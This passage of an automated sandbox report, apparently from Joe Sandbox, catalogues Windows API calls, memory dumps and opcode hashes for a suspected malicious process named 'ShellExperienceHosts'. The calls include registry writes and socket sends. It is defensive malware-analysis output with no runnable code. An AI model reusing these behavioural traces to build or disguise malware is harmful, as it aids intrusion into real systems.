                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$CaptureInvalidateReleaseTimer
                                                                            • String ID:
                                                                            • API String ID: 2903485716-0
                                                                            • Opcode ID: 73b3d1ae1b9231e41f1e2d6a717ba54101ff89b209148f20c4815d8a0da244ba
                                                                            • Instruction ID: 25cb805f92106ce869988aee6d798089556a8d1573f0ce75686423d41478feba
                                                                            • Opcode Fuzzy Hash: 73b3d1ae1b9231e41f1e2d6a717ba54101ff89b209148f20c4815d8a0da244ba
                                                                            • Instruction Fuzzy Hash: 6431AEB1741207EFDF149F20CA44BA9BBB8FF49359F10413AE929C3680DB30A960DB90
                                                                            APIs
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,10017554,00000000,00000102,?), ref: 02235359
                                                                            • RegDeleteValueW.ADVAPI32(?,10017568), ref: 02235369
                                                                            • RegSetValueExW.ADVAPI32(?,10017568,00000000,00000003,1001C6E0,000012A0), ref: 02235387
                                                                            • RegCloseKey.ADVAPI32(?), ref: 02235392
                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 022353F2
                                                                            • Sleep.KERNEL32(00000BB8), ref: 0223540B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Value$CloseCodeDeleteExitOpenProcessSleep
                                                                            • String ID:
                                                                            • API String ID: 4289506047-0
                                                                            • Opcode ID: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                            • Instruction ID: 71612e34817251cbbbb4c9e845a18bac8c4da990b6faa629550c8c695106f933
                                                                            • Opcode Fuzzy Hash: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                            • Instruction Fuzzy Hash: FF31C0B06683819BE726CFB08844F797BB2BB4D308F984498F5899F142D3B0D592CB51
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,6C862579,6C862D87,?,?,?,?,6C84C985,?,?,?,?,?,00000000,00000000), ref: 6C862590
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6C86259E
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6C8625B7
                                                                            • SetLastError.KERNEL32(00000000,?,?,6C84C985,?,?,?,?,?,00000000,00000000,00000000,?,?,?), ref: 6C862609
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            • Opcode ID: 0cd07d1a583335eaf0b1d769e5c551cd5d85a921f7c01d18c6bff26fdca7d27a
                                                                            • Instruction ID: e831d84c129bf4eb029bb96f84d7cc36331b5a4ab3acd0e7f088e87d35e9ab92
                                                                            • Opcode Fuzzy Hash: 0cd07d1a583335eaf0b1d769e5c551cd5d85a921f7c01d18c6bff26fdca7d27a
                                                                            • Instruction Fuzzy Hash: F701F53270D3175E97B0097B6F5CA5A2A74EB0237D7200B79E01042ED0EF55480597D4
                                                                            APIs
                                                                            • type_info::operator==.LIBVCRUNTIME ref: 6C862F94
                                                                            • CallUnexpected.LIBVCRUNTIME ref: 6C86320D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CallUnexpectedtype_info::operator==
                                                                            • String ID: csm$csm$csm
                                                                            • API String ID: 2673424686-393685449
                                                                            • Opcode ID: b1739bcdea87006e9c5254a7062187fb614f3241ca286ee747da2b397dcd4a75
                                                                            • Instruction ID: cabce72f2204dcafe51d36e9667078d5da03fce3e089dcd7e79c94a0833f17de
                                                                            • Opcode Fuzzy Hash: b1739bcdea87006e9c5254a7062187fb614f3241ca286ee747da2b397dcd4a75
                                                                            • Instruction Fuzzy Hash: 09B17B71800209AFCF25DFAACA8499EB7B5FF04319F1449AAE8106BE11D335DA55CF91
                                                                            APIs
                                                                            • __CreateFrameInfo.LIBCMT ref: 031BFF95
                                                                              • Part of subcall function 031BFA76: __getptd.LIBCMT ref: 031BFA84
                                                                              • Part of subcall function 031BFA76: __getptd.LIBCMT ref: 031BFA92
                                                                            • __getptd.LIBCMT ref: 031BFF9F
                                                                              • Part of subcall function 031B381A: __getptd_noexit.LIBCMT ref: 031B381D
                                                                              • Part of subcall function 031B381A: __amsg_exit.LIBCMT ref: 031B382A
                                                                            • __getptd.LIBCMT ref: 031BFFAD
                                                                            • __getptd.LIBCMT ref: 031BFFBB
                                                                            • __getptd.LIBCMT ref: 031BFFC6
                                                                            • _CallCatchBlock2.LIBCMT ref: 031BFFEC
                                                                              • Part of subcall function 031BFB1B: __CallSettingFrame@12.LIBCMT ref: 031BFB67
                                                                              • Part of subcall function 031C0093: __getptd.LIBCMT ref: 031C00A2
                                                                              • Part of subcall function 031C0093: __getptd.LIBCMT ref: 031C00B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1602911419-0
                                                                            • Opcode ID: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                            • Instruction ID: ba62898c0369d320c8ccd90e234ec9fb627ac7c4c3bee86960b7f19f296bbd8e
                                                                            • Opcode Fuzzy Hash: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                            • Instruction Fuzzy Hash: 7511D2B9D00309DFDB00EFA4D844AEDBBB1FF0C310F10856AE824AB250DB389A659F51
                                                                            APIs
                                                                            • __CreateFrameInfo.LIBCMT ref: 100136CB
                                                                              • Part of subcall function 1001325B: __getptd.LIBCMT ref: 10013269
                                                                              • Part of subcall function 1001325B: __getptd.LIBCMT ref: 10013277
                                                                            • __getptd.LIBCMT ref: 100136D5
                                                                              • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                              • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                            • __getptd.LIBCMT ref: 100136E3
                                                                            • __getptd.LIBCMT ref: 100136F1
                                                                            • __getptd.LIBCMT ref: 100136FC
                                                                            • _CallCatchBlock2.LIBCMT ref: 10013722
                                                                              • Part of subcall function 10013300: __CallSettingFrame@12.LIBCMT ref: 1001334C
                                                                              • Part of subcall function 100137C9: __getptd.LIBCMT ref: 100137D8
                                                                              • Part of subcall function 100137C9: __getptd.LIBCMT ref: 100137E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1602911419-0
                                                                            • Opcode ID: 9bbf850cd10a9d142d7ef01923f7ba9f09fdf63f4c6847773a26cfd91f606182
                                                                            • Instruction ID: 22efbb8b190092b33748bf873c8b025e1b03d977775ae1c5574abea826c94994
                                                                            • Opcode Fuzzy Hash: 9bbf850cd10a9d142d7ef01923f7ba9f09fdf63f4c6847773a26cfd91f606182
                                                                            • Instruction Fuzzy Hash: 06112BB5C04209DFDF10DFA4D445AEEBBB1FF48310F10806AF864AB251DB38AA559F50
                                                                            APIs
                                                                            • GetFocus.USER32 ref: 6C7A0ACA
                                                                              • Part of subcall function 6C7A0B66: GetWindowLongW.USER32(6C7A9C68,000000F0), ref: 6C7A0B81
                                                                              • Part of subcall function 6C7A0B66: GetClassNameW.USER32(6C7A9C68,?,0000000A), ref: 6C7A0B96
                                                                              • Part of subcall function 6C7A0B66: CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF,?,?,?,000000FF,6C7A9C68,6C741795,00000000), ref: 6C7A0BAD
                                                                            • GetParent.USER32(00000000), ref: 6C7A0AEB
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 6C7A0B0A
                                                                            • GetParent.USER32(00000000), ref: 6C7A0B18
                                                                            • GetDesktopWindow.USER32 ref: 6C7A0B20
                                                                            • SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 6C7A0B34
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$LongParent$ClassCompareDesktopFocusMessageNameSendString
                                                                            • String ID:
                                                                            • API String ID: 1233893325-0
                                                                            • Opcode ID: c195a6918f13bba941bbf54c816da8e64e058295251021910e0367f407a9d7a9
                                                                            • Instruction ID: 44da91ec6c6ee4c03f5c87f43ad98074617269f102a89f926d8e404e0fc70810
                                                                            • Opcode Fuzzy Hash: c195a6918f13bba941bbf54c816da8e64e058295251021910e0367f407a9d7a9
                                                                            • Instruction Fuzzy Hash: 4AF0863220165277DB1226644F49F6E31796B56F6EF310634F913A3E849B24D903C2D6
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 1000D9CA
                                                                              • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                              • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                            • __amsg_exit.LIBCMT ref: 1000D9EA
                                                                            • __lock.LIBCMT ref: 1000D9FA
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 1000DA17
                                                                            • _free.LIBCMT ref: 1000DA2A
                                                                            • InterlockedIncrement.KERNEL32(02D92830), ref: 1000DA42
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                            • String ID:
                                                                            • API String ID: 3470314060-0
                                                                            • Opcode ID: 4e920ccd90d0088b349a7666ce33f112c59c5ff822d0f6e49aec8d69fe8d2c9d
                                                                            • Instruction ID: a4a3804e7546e288cb55bc9b4da126fdc171610eea7e5ea66b0b3240b360b7e5
                                                                            • Opcode Fuzzy Hash: 4e920ccd90d0088b349a7666ce33f112c59c5ff822d0f6e49aec8d69fe8d2c9d
                                                                            • Instruction Fuzzy Hash: E2019235A057219BF701EF64988579EB3A1FF057D0F018116F851AB289CB34BA81CBE6
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048E1
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048EC
                                                                            • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 100048F9
                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 10004914
                                                                            • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 1000491D
                                                                            • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 1000492E
                                                                              • Part of subcall function 10003F60: GetCurrentThreadId.KERNEL32 ref: 10003F65
                                                                              • Part of subcall function 10003F60: send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
                                                                              • Part of subcall function 10003F60: SetEvent.KERNEL32(?), ref: 10003FE9
                                                                              • Part of subcall function 10003F60: InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
                                                                              • Part of subcall function 10003F60: WSACloseEvent.WS2_32(?), ref: 10004003
                                                                              • Part of subcall function 10003F60: shutdown.WS2_32(?,00000001), ref: 1000401B
                                                                              • Part of subcall function 10003F60: closesocket.WS2_32(?), ref: 10004025
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                            • String ID:
                                                                            • API String ID: 1019945655-0
                                                                            • Opcode ID: 3a30db2477d7f785b2e787c45e20f2cfe3e7392a271029e59f364346de097013
                                                                            • Instruction ID: b3bd2b528433ae293362b27f5e3b1343b14dca1381540b702c4300f5d31fb9dc
                                                                            • Opcode Fuzzy Hash: 3a30db2477d7f785b2e787c45e20f2cfe3e7392a271029e59f364346de097013
                                                                            • Instruction Fuzzy Hash: 1AF096762046149BD210EBA9CC84D4BF3E9EFC8761B158B19F26987694CA71FC01CBA0
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C7DC460
                                                                            • GetVersionExW.KERNEL32(?), ref: 6C7DC4DC
                                                                            • CoInitializeEx.OLE32(00000000,00000002), ref: 6C7DC66C
                                                                            • CoCreateInstance.OLE32(6C89BAA8,00000000,00000001,6C8A3614,?), ref: 6C7DC6B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateH_prolog3_InitializeInstanceVersion
                                                                            • String ID: @
                                                                            • API String ID: 1117250964-2766056989
                                                                            • Opcode ID: fc0b1920ddbaf26d12f9662a073db07a6feb7fa053d9e9733d22acf323771602
                                                                            • Instruction ID: e14d6b7308bf23a0e78c664a4363e1d7270a68d7eeeb79d79db1619bb1329ae4
                                                                            • Opcode Fuzzy Hash: fc0b1920ddbaf26d12f9662a073db07a6feb7fa053d9e9733d22acf323771602
                                                                            • Instruction Fuzzy Hash: C9815AB0B01616AFD754DF28CA44BD9BBF4BF09325F01426AE818D7740DB30A955CFA5
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C756911
                                                                              • Part of subcall function 6C7C2EEA: __EH_prolog3.LIBCMT ref: 6C7C2EF1
                                                                              • Part of subcall function 6C770A0E: GetDlgCtrlID.USER32(?), ref: 6C770A19
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3$Ctrl
                                                                            • String ID: %TsBasePane-%d$%TsBasePane-%d%x$BasePanes$IsVisible
                                                                            • API String ID: 3879667756-2169875744
                                                                            • Opcode ID: 7f9d5bbd93e353fdef8f974c399cb3111feecc1458872a3b4850a8d95095d9e0
                                                                            • Instruction ID: 5dfbf864540a9c9c1aee894818808ef512a3ba9fe5f04a01e378cd148a193557
                                                                            • Opcode Fuzzy Hash: 7f9d5bbd93e353fdef8f974c399cb3111feecc1458872a3b4850a8d95095d9e0
                                                                            • Instruction Fuzzy Hash: B131D471A002099BCF10DFA4CD98DFDB775BF8A318F140668E512B7790CB309915DB51
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Text$H_prolog3
                                                                            • String ID: 4<ml
                                                                            • API String ID: 1044789843-3878392967
                                                                            • Opcode ID: 601c2361fdcb4eb1cc09c9fffcce2f3191681a6b8e7817185291a3a393d2920c
                                                                            • Instruction ID: 9a4a2c6d08609e3fb1ba9e8710df3f0351e37ed972a836a147b750a56d25e335
                                                                            • Opcode Fuzzy Hash: 601c2361fdcb4eb1cc09c9fffcce2f3191681a6b8e7817185291a3a393d2920c
                                                                            • Instruction Fuzzy Hash: E021F132700119AFCF159FB4CD4899DB775BF49318B044239E52597A60DB31EA14DBA4
                                                                            APIs
                                                                            • ___BuildCatchObject.LIBCMT ref: 10013A63
                                                                              • Part of subcall function 100139BE: ___BuildCatchObjectHelper.LIBCMT ref: 100139F4
                                                                            • _UnwindNestedFrames.LIBCMT ref: 10013A7A
                                                                            • ___FrameUnwindToState.LIBCMT ref: 10013A88
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                            • String ID: csm$csm
                                                                            • API String ID: 2163707966-3733052814
                                                                            • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                            • Instruction ID: e6390535bab9e49693186baa48b022ad9d19c19648d68c038876df6954aae2ed
                                                                            • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                            • Instruction Fuzzy Hash: AE01F675401109BBDF12DF51CC45EAB7F6AEF08390F508024FD5819121D776E9B1DBA1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$H_prolog3Visible
                                                                            • String ID:
                                                                            • API String ID: 3969123015-0
                                                                            • Opcode ID: e02c45a351f37cbe4b5f58eae5e8a889a1b116f5b310cc343de82e08ccb85330
                                                                            • Instruction ID: 9f5ad1923ee334f11f5a37f6cc9075edc326b13c53ef28ebfcbab1e2e123ce2a
                                                                            • Opcode Fuzzy Hash: e02c45a351f37cbe4b5f58eae5e8a889a1b116f5b310cc343de82e08ccb85330
                                                                            • Instruction Fuzzy Hash: C5F19F71B012159BCF05CB64C858AED77B7BF89318F240169E922E7780DF34AD06CB98
                                                                            APIs
                                                                              • Part of subcall function 6C73913E: GetParent.USER32(?), ref: 6C73916A
                                                                            • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 6C6F8D35
                                                                            • IsWindow.USER32(?), ref: 6C6F8FDF
                                                                            • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6C6F900C
                                                                            • GetParent.USER32(?), ref: 6C6F9015
                                                                            • RedrawWindow.USER32(?,00000000,00000000,00000185,00000000), ref: 6C6F902D
                                                                              • Part of subcall function 6C6F636E: GetClientRect.USER32(?,?), ref: 6C6F63FF
                                                                              • Part of subcall function 6C6F636E: IsRectEmpty.USER32(?), ref: 6C6F6409
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
